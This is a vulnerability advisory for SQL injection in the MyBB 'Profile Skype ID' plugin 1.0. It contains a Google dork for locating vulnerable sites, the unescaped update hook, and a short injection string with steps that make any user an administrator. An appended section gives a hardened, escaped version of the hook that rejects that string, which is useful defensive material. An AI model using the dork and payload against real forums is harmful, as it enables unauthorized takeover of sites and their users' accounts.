# Exploit Title: Profile Skype ID MyBB plugin privilege escalation.
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------

The ProfileSkypeID plugin suffers from SQL injection in an UPDATE query.
The vulnerability exists within profileskype.php, which is located in the /inc/plugins/ folder.

<?php
$plugins->add_hook("datahandler_user_update", "profileskype_update"); /*Line 15*/

function profileskype_update($skype) /*Line 167*/
{
    global $mybb;
    if (isset($mybb->input['skype']))
    {
        // The submitted value is copied into the UPDATE data without escaping.
        $skype->user_update_data['skype'] = $mybb->input['skype'];
    }
}
?>

How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert the following string in your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.

Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updating the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png
----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/
MyBB Profile Skype ID Plugin 1.0 Privilege Escalation Vulnerability
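
A hardened form of the profileskype_update hook, as an added example that is not the plugin author's code: it allow-lists the Skype ID and then escapes it with MyBB's $db->escape_string() before the value enters the UPDATE data. The helper name profileskype_clean and the Skype ID pattern are assumptions made for this example.

```php
<?php
// Added example, not the plugin author's code.
// Assumption: a Skype ID is 6-32 characters, starts with a letter and uses
// only letters, digits, '.', '_' and '-'. Adjust the pattern to your policy.
function profileskype_clean($raw)
{
    if (!is_string($raw)) {
        return null;          // arrays and other types are rejected outright
    }
    $raw = trim($raw);
    if ($raw === '') {
        return '';            // the user cleared the field
    }
    return preg_match('/\A[A-Za-z][A-Za-z0-9._-]{5,31}\z/', $raw) === 1 ? $raw : null;
}

function profileskype_update($skype)
{
    global $mybb, $db;

    if (!isset($mybb->input['skype'])) {
        return;
    }
    $clean = profileskype_clean($mybb->input['skype']);
    if ($clean === null) {
        return;               // rejected: the stored value stays unchanged
    }
    // Escape where the value enters the UPDATE data, even though the
    // allow-list already excludes quotes (defence in depth).
    $skype->user_update_data['skype'] = $db->escape_string($clean);
}

if (isset($plugins)) {
    // Inside MyBB: register on the same hook as the original plugin.
    $plugins->add_hook("datahandler_user_update", "profileskype_update");
} else {
    // Stand-alone run with constructed inputs, including the string from step (2).
    foreach (array("zixem.example", "zix', usergroup='4", "") as $sample) {
        var_dump(profileskype_clean($sample));
    }
}
```

Run outside MyBB, the script prints the accepted ID, NULL for the string from step (2), and an empty string for a cleared field.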